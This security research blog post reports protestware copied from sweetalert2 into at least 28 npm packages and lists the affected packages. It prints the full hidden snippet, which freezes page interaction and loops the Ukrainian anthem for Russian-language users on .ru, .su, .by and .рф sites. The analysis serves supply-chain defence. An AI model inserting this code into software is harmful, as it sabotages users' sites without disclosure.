Tracking Protestware Spread: 28 npm Packages Affected by Payload Targeting Russian-Language Users

Socket’s Threat Research Team recently reported on two npm packages with hidden functionality for Russian-language users visiting Russian domains in a browser. In the last few weeks, the team has found the same protestware script across at least 28 new packages with nearly 2,000 versions.

As a reminder, this code will stop UI interactions on websites from working for any Russian-language users visiting Russian or Belarusian websites, falling under the classification of Socket’s protestware alert.

Technical Recap: How the Protestware Works#

Most of these packages have had 100,000+ lines of code in them:

Deep within the code, usually towards the end, there is an identical code snippet to the one discussed in our original blog post.

It is a complex if statement that requires the user (1) is using a browser (2) has their browser language settings set to Russian and (3) is visiting a Russian or Belarusian domain. If all three stipulations are met, the protestware will disable all mouse-based interaction on the page and play the Ukrainian national anthem.

// Dear russian users visiting russian sites. Let's have fun.
	  if (typeof window !== 'undefined' && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|by|xn--p1ai)$/)) {
	    var now = new Date();
	    var initiationDate = localStorage.getItem('swal-initiation');
	    if (!initiationDate) {
	      localStorage.setItem('swal-initiation', "".concat(now));
	    } else if ((now.getTime() - Date.parse(initiationDate)) / (1000 * 60 * 60 * 24) > 3) {
	      setTimeout(function () {
	        document.body.style.pointerEvents = 'none';
	        var ukrainianAnthem = document.createElement('audio');
	        ukrainianAnthem.src = 'https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3';
	        ukrainianAnthem.loop = true;
	        document.body.appendChild(ukrainianAnthem);
	        setTimeout(function () {
	          ukrainianAnthem.play()["catch"](function () {
	            // ignore
	          });
	        }, 2500);
	      }, 500);
	    }
	  }

New Findings: Widespread Reuse and Supply Chain Propagation#

Sweetalert2, a package with over 700,000+ weekly downloads, has certain versions containing the protestware. It’s a package for "A beautiful, responsive, customizable and accessible (WAI-ARIA) replacement for JavaScript's popup boxes, supported fork of sweetalert."

On sweetalert2's npm registry page, the author discloses the protestware:

Important notice about the usage of this software for .ru, .su, .by, and .рф domain zones As a consequence of the illegal war in Ukraine, the behavior of this repository and related npm package sweetalert2 is different for .ru, .su, .by, and .рф domain zones.

Including this software in any domain in .ru, .su, .by, and .рф domain zones will block the website navigation and play the national anthem of Ukraine.

The author, limonte, began disclosing this information in version 11.6.14, which was published 3 years ago, likely when Russia invaded Ukraine, and has disclosed it in every version since. The package is currently on version 11.22.2. Versions 9.17.3 11.6.6 also include this protestware.

However, several different packages with different authors all seem to have this protestware without any mention of it. It is not listed or acknowledged in their README files, nor any other place. It seems they downloaded it from SweetAlert2, based on the similar file name and structure between different packages with the protestware. The protestware has spread from SweetAlert2, likely through copied code, in a pattern resembling unintentional supply chain propagation.

Here is a list of some of the packages we have found with the protestware:

Package | Publish Date | Peak Download # | Author info | Current State | Versions | Most recent version update

• starlawfirm-counsel-function-test | Created 5 Months Ago | 1,281 | @kimminsu_2 | Deprecated | All (18) | Version 0.2.4 Published 5 Months Ago
• @starlawfirm/counsel-function | Created 5 Months Ago | 284 | @choiyeongung, @kimminsu_2 ,imjiwon, leegeonju2 | Live | All (13) | Version 0.0.12 published 17 hours ago
• falcon-library-comp | Created 6 Months Ago | 1,822 | falcon.ttt | Live | 0.0.34 - 0.0.42 (7) | Version 0.0.42 | Published 5 Months Ago
• vristo-components | Created A Year Ago | 575 | amirzarei | Live | 0.0.12 - 0.1.8 (29) | Version 0.1.8 | Published A Year Ago
• currency_contry_exchange | Created 9 Months Ago | 1,276 | [lash1795](<https://www.npmjs.com/~lash1795>) | Live | 1.2.7 - 1.7.1(27) | Version 1.7.1 | Published 21 Hours Ago
• @flasher/flasher-sweetalert | Created 3 Years Ago | 276 | [yoeunes](<https://www.npmjs.com/~yoeunes>) | Live | All (29) | Version 2.1.5 | Published 5 Months Ago
• @khaledtag/karrot_ui | Created A Year Ago | 446 | khaledtag | Live | All (13) | Version 0.0.51 | Published 10 Months Ago
• raffoom-poltergeist | Created 2 Years Ago | 156 | raffoom-ltd | Live | 0.0.7-rev-006 - 0.0.9-rev1 (11) | Version 0.0.9-rev1 | Published 2 Months Ago
• @trustech/components | Created 9 Months Ago | 378 | power_trustech | Live | 1.0.3 - 1.2.10 (19) | Version 1.2.10 | Published 5 Months Ago
• be-table-template | Created Last Year | 951 | taonv | Live | 1.0.1 - 2.9.8 (198) | Version 2.9.8 | Published A Month Ago
• shafa-bo | Created Last Year | 233 | binapm | Live | 0.0.68 - 0.0.134 (49) | Version 0.0.134 | Published A Year Ago
• Pandora-Cloud-DC | Created 2 Years Ago | dockercore | Live | All (1) | Version 0.1.0 | Published 2 Years Ago
• fakeoai | Created 1 Year Ago | laibaoyuan | Live | 0.1.5 - 0.1.6 (2) | Version 0.1.6 | Published 1 Year Ago
• Pandora-Cloud | Created 2 Years Ago | pengzhile | Live | 0.4.7- 0.7.3 (12) | Version 0.7.3. | Published 1 Year Ago
• richness-client-side-validator | Created 2 Years Ago | richnessinc | Deprecated | 1.1.0 - 1.5.7 (14) | Version 1.5.7 | Published 2 Years Ago
• kdpa-components | Created 2 Years Ago | 734 | work.enaadb, frontenddepna, lotfalizade.moh| Live | 1.0.0 - 1.58.4 (259) | 1.58.4 | Published Last Week
• coone-annotation-tool | Created 2 Years Ago | 1,150 | mede | Live | 0.0.78 - 0.1.153 (177) | Version 0.1.155 | Published 9 Hours Ago
• landing-goplaceit2 | Created 2 Years Ago | 32 | enzo388 | Live | 1.0.48 - 1.0.58 (10) | Version 1.0.58 | Published 2 Years Ago
• meshcentral| Created 8 Years Ago | 16,895 | ysainthilaire | Live | [1.1.32 - 1.1.44](<https://www.npmjs.com/package/meshcentral/v/0.9.68?activeTab=versions>) (12) | Version 1.1.44 | Published 20 Hours Ago
• @esvndev/es-react-table-interface | Created 2 Months Ago | 820 | esvndev | Live | All (62) | Version 1.4.6 | Published 4 Days Ago
• @esvndev/es-react-dynamic-column| Created Last Month | 673 | esvndev | Live | All (14) | Version 1.0.14 | Published A Month Ago
• files.photo.gallery| Created 5 Years Ago | 409 | [photo.gallery](http://photo.galleryhttps://www.npmjs.com/~photo.gallery) | Live | 0.6.0 - 0.13.1 (33) | Version 0.13.1 | Published A Month Ago
• qti3-item-player | Created 4 Years Ago | 267 | paulgrudnitski | Live | 0.4.15 - 1.1.20 (40) | Version 1.1.20 | Published 2 Months Ago
• qumra-ui | Created 10 Months Ago | 2,074 | abdalstar, khalidwalid00| Live | 0.0.71- 0.0.153 (82) | Version 0.0.153 | Published 3 Months Ago
• qumra-editor | Created 12 Months Ago | 227 | abdalstar, motea | Live | 0.0.4 - 0.0.8 (4) | Version 0.0.8 | Published 10 Months Ago
• alurkerja-ui | Created 2 Years Ago | 1,521 | theakistea | Live | [0.0.3 - 0.0.575](<https://www.npmjs.com/package/alurkerja-ui?activeTab=versions>) (572) | Version 0.0.575 | Published A Month Ago
• konnektive-engine | Created 3 Years Ago | 229 | brunoferreiras , drew.altukhov | Live | 0.2.2 - 0.3.82 (59) | Version 0.3.82 | Published A Month Ago
• es-workflow-template | Created 5 Months Ago | 602 | becoxy | Live | All (32) | Version 0.4.5 | Published 18 Days Ago

Who is Targeted?#

limonte ensured that only repeat visitors are targeted, so anyone who mistakenly finds their way to such a domain and has their language set to Russian will not be impacted. Unless, of course, they make that same mistake twice.

Other users may be Russian-speaking researchers visiting official state websites or archived domains. As a note, many people speak Russian across the world, including people in Central Asia like Kazakhstan and in Ukraine.

Since so many packages downloaded versions of SweetAlert2 without disclosing that this protestware exists in their code, it’s likely the addition of this protestware has had a cascading effect.

Outlook and Recommendations#

Protestware is a formidable method of speech for software developers to express political or social stances. Socket supports this freedom for developers to create as they see fit.

We are marking these packages as malware since that is the definition with which the activity aligns most closely. The package triggers unexpected behavior for some users and, other than sweetalert2 itself, the behavior is not documented. Because the protestware is undocumented in most of these packages, developers and users may be unaware of its presence or intent, even if it was copied unintentionally. This lack of transparency increases the risk of surprise behavior and erodes trust in the ecosystem.

Socket has flagged the packages with this protestware as malware, with the following explicit description:

The package contains a hidden payload that targets Russian language users visiting Russian and Belarusian sites. For those users, it will disable user interaction and play a looping audio of the Ukrainian anthem after 3 days. Therefore, it is marked as malware only because it freezes interactions for many users. This behavior is not disclosed in any documentation of the package and seriously disrupts user experience.

This protestware underscores that actions taken by developers can propagate unnoticed in nested dependencies and may take days or weeks to manifest. The Socket Threat Research Team continues to find more examples of this protestware. These findings serve as a reminder to check your packages. Socket can help.

By integrating Socket's free security tools early in your development workflow, you can effectively prevent unknown functionality.

• Socket GitHub App: Automated real-time security analysis of dependencies.
• Socket CLI Tool: Inspect and detect anomalies during npm builds and installations.
• Browser Extension: Scans npm package pages in your browser as you browse, flags suspicious or malicious code snippets in real-time, and warns you before you install or download a risky package.

MITRE ATT&CK Framework#

• T1491.001 - Defacement: Internal Defacement
• T1499 - Endpoint Denial of Service
• T1140 - Deobfuscate/Decode Files or Information
• T1082 - System Information Discovery